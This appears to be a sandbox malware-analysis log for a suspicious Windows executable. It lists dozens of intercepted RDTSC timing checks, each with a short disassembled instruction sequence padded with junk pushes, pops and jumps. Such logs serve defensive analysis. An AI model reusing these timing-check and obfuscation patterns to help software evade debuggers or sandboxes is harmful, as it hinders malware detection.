Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A59D0D second address: A59D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A64C0E second address: A64C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007F6E9D0B3536h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A64C1A second address: A64C1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A6840B second address: A68420 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6E9D0B3536h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F6E9D0B3536h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A68420 second address: A68424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A68424 second address: A6842D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A6A35B second address: A6A361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A69EEC second address: A69EF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A85322 second address: A85328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A85328 second address: A8533B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E9D0B353Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A8533B second address: A85358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE04439h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A854DA second address: A854DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A854DE second address: A854E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A854E4 second address: A854FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B353Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jng 00007F6E9D0B3536h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A854FC second address: A8552A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6E9CE04426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jno 00007F6E9CE04428h 0x00000013 jl 00007F6E9CE0443Dh 0x00000019 jmp 00007F6E9CE04431h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A8552A second address: A85544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E9D0B3542h 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A856A8 second address: A856AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A856AE second address: A856C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F6E9D0B3541h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A856C8 second address: A856CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A856CC second address: A856D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A8599A second address: A859B6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6E9CE0442Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F6E9CE0442Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A859B6 second address: A859BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A859BF second address: A859C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A85B36 second address: A85B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A880B8 second address: A880C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007F6E9CE04426h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A880C4 second address: A880C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A8B762 second address: A8B769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A99AF3 second address: A99AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A99AF9 second address: A99B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6E9CE04426h 0x0000000a popad 0x0000000b push edx 0x0000000c jns 00007F6E9CE04426h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A9B43D second address: A9B449 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6E9D0B3536h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A9B449 second address: A9B44E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A95689 second address: A9568D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A9568D second address: A9569A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A9569A second address: A9569E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: A9569E second address: A956AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6E9CE04426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: ABD697 second address: ABD69B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: ABD69B second address: ABD6A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6E9CE04426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: ABD84B second address: ABD84F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: ABDC2E second address: ABDC34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: ABE03B second address: ABE03F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: ABE03F second address: ABE053 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a jnp 00007F6E9CE04426h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: AC2830 second address: AC2836 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: AC2836 second address: AC28A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE0442Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6E9CE04430h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F6E9CE04428h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a push 00000004h 0x0000002c jmp 00007F6E9CE04430h 0x00000031 push A5936300h 0x00000036 push esi 0x00000037 pushad 0x00000038 jmp 00007F6E9CE0442Eh 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: AC2B54 second address: AC2B58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: AC2B58 second address: AC2B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jno 00007F6E9CE04443h 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007F6E9CE04426h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: AC2B71 second address: AC2B91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B3541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push esi 0x0000000c je 00007F6E9D0B353Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: AC2B91 second address: AC2BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F6E9CE04430h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: AC4102 second address: AC4142 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B353Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b jmp 00007F6E9D0B353Eh 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jnc 00007F6E9D0B3536h 0x0000001c jmp 00007F6E9D0B353Ah 0x00000021 push edx 0x00000022 pop edx 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: AC4142 second address: AC4148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 53F040B second address: 53F044F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B3541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6E9D0B3541h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6E9D0B3548h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 53F044F second address: 53F0453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 53F0453 second address: 53F0459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 53F0459 second address: 53F04AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ch 0x00000005 pushfd 0x00000006 jmp 00007F6E9CE04439h 0x0000000b add al, 00000076h 0x0000000e jmp 00007F6E9CE04431h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F6E9CE04438h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 53F04AE second address: 53F04B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 53F04B2 second address: 53F04B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 53F04B8 second address: 53F04CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ch 0x00000005 mov bx, D20Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov edx, dword ptr [ebp+0Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 53F04CC second address: 53F04D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, ch 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5410631 second address: 5410663 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B353Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F6E9D0B353Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 call 00007F6E9D0B353Ah 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5410663 second address: 5410669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5410669 second address: 5410683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B353Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ax, bx 0x00000012 push ebx 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5410683 second address: 54106A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE04432h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54106A0 second address: 541073C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6E9D0B3549h 0x00000008 adc eax, 3654A296h 0x0000000e jmp 00007F6E9D0B3541h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ecx 0x00000018 jmp 00007F6E9D0B353Eh 0x0000001d push eax 0x0000001e pushad 0x0000001f mov si, dx 0x00000022 popad 0x00000023 xchg eax, ecx 0x00000024 jmp 00007F6E9D0B353Fh 0x00000029 xchg eax, esi 0x0000002a jmp 00007F6E9D0B3546h 0x0000002f push eax 0x00000030 jmp 00007F6E9D0B353Bh 0x00000035 xchg eax, esi 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 call 00007F6E9D0B3547h 0x0000003e pop ecx 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 541073C second address: 541075F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE04436h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 541075F second address: 5410765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5410765 second address: 5410769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5410769 second address: 54107A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F6E9D0B3548h 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007F6E9D0B3540h 0x00000016 push dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov cx, di 0x0000001f mov ecx, ebx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54107A9 second address: 54107AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54107AF second address: 54107B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54107F6 second address: 541080E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E9CE04434h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 541080E second address: 5410812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54108B2 second address: 54108D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6E9CE0442Fh 0x00000008 mov esi, 4B90434Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 leave 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54108D3 second address: 54108D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54108D7 second address: 54108DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54108DD second address: 54108E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54108E3 second address: 54108E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54108E7 second address: 5400053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B3540h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f sub esp, 04h 0x00000012 xor ebx, ebx 0x00000014 cmp eax, 00000000h 0x00000017 je 00007F6E9D0B369Ah 0x0000001d mov dword ptr [esp], 0000000Dh 0x00000024 call 00007F6EA1CAF6D1h 0x00000029 mov edi, edi 0x0000002b jmp 00007F6E9D0B3540h 0x00000030 xchg eax, ebp 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F6E9D0B353Dh 0x00000038 sbb cx, 2556h 0x0000003d jmp 00007F6E9D0B3541h 0x00000042 popfd 0x00000043 popad 0x00000044 push eax 0x00000045 jmp 00007F6E9D0B3541h 0x0000004a xchg eax, ebp 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400053 second address: 5400057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400057 second address: 540005B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 540005B second address: 5400061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400061 second address: 5400067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400067 second address: 540006B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 540006B second address: 540009E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F6E9D0B3548h 0x0000000f sub esp, 2Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F6E9D0B353Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 540009E second address: 54000A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54000A2 second address: 54000A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 54000A8 second address: 540011C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 18h 0x00000005 pushfd 0x00000006 jmp 00007F6E9CE04439h 0x0000000b sub si, CAD6h 0x00000010 jmp 00007F6E9CE04431h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b jmp 00007F6E9CE0442Ch 0x00000020 mov cx, E9D1h 0x00000024 popad 0x00000025 push eax 0x00000026 jmp 00007F6E9CE04437h 0x0000002b xchg eax, ebx 0x0000002c pushad 0x0000002d pushad 0x0000002e mov esi, 481BA4B1h 0x00000033 movzx ecx, dx 0x00000036 popad 0x00000037 push eax 0x00000038 push edx 0x00000039 push edx 0x0000003a pop eax 0x0000003b rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 540011C second address: 5400140 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6E9D0B3548h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400140 second address: 5400144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 5400144 second address: 540014A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
